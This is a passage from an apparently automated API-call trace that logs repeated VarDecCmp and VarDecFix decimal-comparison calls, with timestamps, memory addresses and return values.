0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.599] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.601] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.601] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.602] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.602] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.602] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.602] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.602] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c318, pdecRight=0x1b83c308) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c2f8, pdecRight=0x1b83c2e8) returned 0x2 [0266.603] VarDecCmp (pdecLeft=0x1b83c4a0, pdecRight=0x1b83c490) returned 0x2 [0266.603] VarDecCmp (pdecLeft=0x1b83c480, pdecRight=0x1b83c470) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.603] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.603] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c4b8, pdecRight=0x1b83c4a8) returned 0x0 [0266.604] VarDecCmp (pdecLeft=0x1b83c478, pdecRight=0x1b83c468) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c458, pdecRight=0x1b83c448) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c708, pdecRight=0x1b83c6f8) returned 0x1 [0266.604] VarDecCmp (pdecLeft=0x1b83c6e8, pdecRight=0x1b83c6d8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.605] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.605] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.606] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.606] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.606] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.607] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.607] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.607] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.607] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.607] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.607] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.607] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.607] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.608] VarDecCmp (pdecLeft=0x1b83c978, pdecRight=0x1b83c968) returned 0x2 [0266.608] VarDecCmp (pdecLeft=0x1b83c858, pdecRight=0x1b83c848) returned 0x2 [0266.608] VarDecFix (in: pdecIn=0x1b83c838, pdecResult=0x1b83c7c0 | out: pdecResult=0x1b83c7c0) returned 0x0 [0266.608] VarDecCmp (pdecLeft=0x1b83c828, pdecRight=0x1b83c818) returned 0x1 [0266.608] VarDecCmp (pdecLeft=0x1b83c850, pdecRight=0x1b83c840) returned 0x2 [0266.608] VarDecFix (in: pdecIn=0x1b83c830, pdecResult=0x1b83c7a0 | out: pdecResult=0x1b83c7a0) returned 0x0 [0266.608] VarDecCmp (pdecLeft=0x1b83c820, pdecRight=0x1b83c810) returned 0x1 [0266.608] VarDecCmp (pdecLeft=0x1b83c800, pdecRight=0x1b83c7f0) returned 0x2 [0266.608] VarDecCmp (pdecLeft=0x1b83c838, pdecRight=0x1b83c828) returned 0x2 [0266.608] VarDecCmp (pdecLeft=0x1b83c948, pdecRight=0x1b83c938) returned 0x0 [0266.608] VarDecCmp (pdecLeft=0x1b83c9f8, pdecRight=0x1b83c9e8) returned 0x2 [0266.608] VarDecCmp (pdecLeft=0x1b83c618, pdecRight=0x1b83c608) returned 0x0 [0266.608] VarDecCmp (pdecLeft=0x1b83c5d8, pdecRight=0x1b83c5c8) returned 0x1 [0266.608] VarDecCmp (pdecLeft=0x1b83c5b8, pdecRight=0x1b83c5a8) returned 0x1 [0266.608] VarDecCmp (pdecLeft=0x1b83c868, pdecRight=0x1b83c858) returned 0x1 [0266.608] VarDecCmp (pdecLeft=0x1b83c848, pdecRight=0x1b83c838) returned 0x1 [0266.609] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.609] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.609] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.609] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.610] VarDecCmp (pdecLeft=0x1b83c518, pdecRight=0x1b83c508) returned 0x0 [0266.610] VarDecCmp (pdecLeft=0x1b83c4f8, pdecRight=0x1b83c4e8) returned 0x2 [0266.610] VarDecCmp (pdecLeft=0x1b83c6a0, pdecRight=0x1b83c690) returned 0x2 [0266.610] VarDecCmp (pdecLeft=0x1b83c680, pdecRight=0x1b83c670) returned 0x0 [0266.611] VarDecCmp (pdecLeft=0x1b83c758, pdecRight=0x1b83c748) returned 0x0 [0266.611] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x2 [0266.611] VarDecCmp (pdecLeft=0x1b83c8e0, pdecRight=0x1b83c8d0) returned 0x2 [0266.611] VarDecCmp (pdecLeft=0x1b83c8c0, pdecRight=0x1b83c8b0) returned 0x0 [0266.611] VarDecCmp (pdecLeft=0x1b83c758, pdecRight=0x1b83c748) returned 0x0 [0266.611] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x2 [0266.611] VarDecCmp (pdecLeft=0x1b83c8e0, pdecRight=0x1b83c8d0) returned 0x2 [0266.611] VarDecCmp (pdecLeft=0x1b83c8c0, pdecRight=0x1b83c8b0) returned 0x0 [0266.612] VarDecCmp (pdecLeft=0x1b83c758, pdecRight=0x1b83c748) returned 0x0 [0266.612] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x2 [0266.612] VarDecCmp (pdecLeft=0x1b83c8e0, pdecRight=0x1b83c8d0) returned 0x2 [0266.612] VarDecCmp (pdecLeft=0x1b83c8c0, pdecRight=0x1b83c8b0) returned 0x0 [0266.612] VarDecCmp (pdecLeft=0x1b83c758, pdecRight=0x1b83c748) returned 0x0 [0266.612] VarDecCmp (pdecLeft=0x1b83c738, pdecRight=0x1b83c728) returned 0x2 [0266.612] VarDecCmp (pdecLeft=0x1b83c8e0, pdecRight=0x1b83c8d0) returned 0x2 [0266.612] VarDecCmp (pdecLeft=0x1b83c8c0, pdecRight=0x1b83c8b0) returned 0x0 [0266.614] VarDecCmp (pdecLeft=0x1b83c8e8, pdecRight=0x1b83c8d8) returned 0x2 [0266.614] VarDecCmp (pdecLeft=0x1b83c7c8, pdecRight=0x1b83c7b8) returned 0x2 [0266.614] VarDecFix (in: pdecIn=0x1b83c7a8, pdecResult=0x1b83c730 | out: pdecResult=0x1b83c730) returned 0x0 [0266.614] VarDecCmp (pdecLeft=0x1b83c798, pdecRight=0x1b83c788) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c7c0, pdecRight=0x1b83c7b0) returned 0x2 [0266.614] VarDecFix (in: pdecIn=0x1b83c7a0, pdecResult=0x1b83c710 | out: pdecResult=0x1b83c710) returned 0x0 [0266.614] VarDecCmp (pdecLeft=0x1b83c790, pdecRight=0x1b83c780) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c770, pdecRight=0x1b83c760) returned 0x2 [0266.614] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x2 [0266.614] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c898, pdecRight=0x1b83c888) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c7a8, pdecRight=0x1b83c798) returned 0x2 [0266.614] VarDecCmp (pdecLeft=0x1b83c8b8, pdecRight=0x1b83c8a8) returned 0x0 [0266.614] VarDecCmp (pdecLeft=0x1b83c968, pdecRight=0x1b83c958) returned 0x2 [0266.614] VarDecCmp (pdecLeft=0x1b83c588, pdecRight=0x1b83c578) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c568, pdecRight=0x1b83c558) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c588, pdecRight=0x1b83c578) returned 0x0 [0266.614] VarDecCmp (pdecLeft=0x1b83c548, pdecRight=0x1b83c538) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c528, pdecRight=0x1b83c518) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c7d8, pdecRight=0x1b83c7c8) returned 0x1 [0266.614] VarDecCmp (pdecLeft=0x1b83c7b8, pdecRight=0x1b83c7a8) returned 0x1 [0266.628] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.628] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.628] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.628] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.628] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.628] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.628] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.628] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.628] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.628] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.628] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.629] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.629] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.629] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.629] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.629] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.629] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.629] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.629] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.629] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.630] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.631] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.631] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.631] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.631] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.631] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.631] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.631] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.631] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.631] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.631] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.632] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.632] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.632] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.632] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.632] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.632] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.632] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.632] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.632] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.632] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.632] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.632] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.633] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.633] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.633] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.633] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.633] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.633] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.633] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.633] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.634] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.634] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.634] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.634] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.634] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.634] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.635] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.635] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.635] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.635] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c7f8, pdecRight=0x1b83c7e8) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c418, pdecRight=0x1b83c408) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c3f8, pdecRight=0x1b83c3e8) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c3d8, pdecRight=0x1b83c3c8) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c398, pdecRight=0x1b83c388) returned 0x2 [0266.635] VarDecCmp (pdecLeft=0x1b83c358, pdecRight=0x1b83c348) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c338, pdecRight=0x1b83c328) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c668, pdecRight=0x1b83c658) returned 0x1 [0266.635] VarDecCmp (pdecLeft=0x1b83c648, pdecRight=0x1b83c638) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c778, pdecRight=0x1b83c768) returned 0x2 [0266.637] VarDecCmp (pdecLeft=0x1b83c658, pdecRight=0x1b83c648) returned 0x2 [0266.637] VarDecFix (in: pdecIn=0x1b83c638, pdecResult=0x1b83c5c0 | out: pdecResult=0x1b83c5c0) returned 0x0 [0266.637] VarDecCmp (pdecLeft=0x1b83c628, pdecRight=0x1b83c618) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c650, pdecRight=0x1b83c640) returned 0x2 [0266.637] VarDecFix (in: pdecIn=0x1b83c630, pdecResult=0x1b83c5a0 | out: pdecResult=0x1b83c5a0) returned 0x0 [0266.637] VarDecCmp (pdecLeft=0x1b83c620, pdecRight=0x1b83c610) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c600, pdecRight=0x1b83c5f0) returned 0x2 [0266.637] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.637] VarDecCmp (pdecLeft=0x1b83c748, pdecRight=0x1b83c738) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c728, pdecRight=0x1b83c718) returned 0x1 [0266.637] VarDecCmp (pdecLeft=0x1b83c638, pdecRight=0x1b83c628) returned 0x2 [0266.637] VarDecCmp 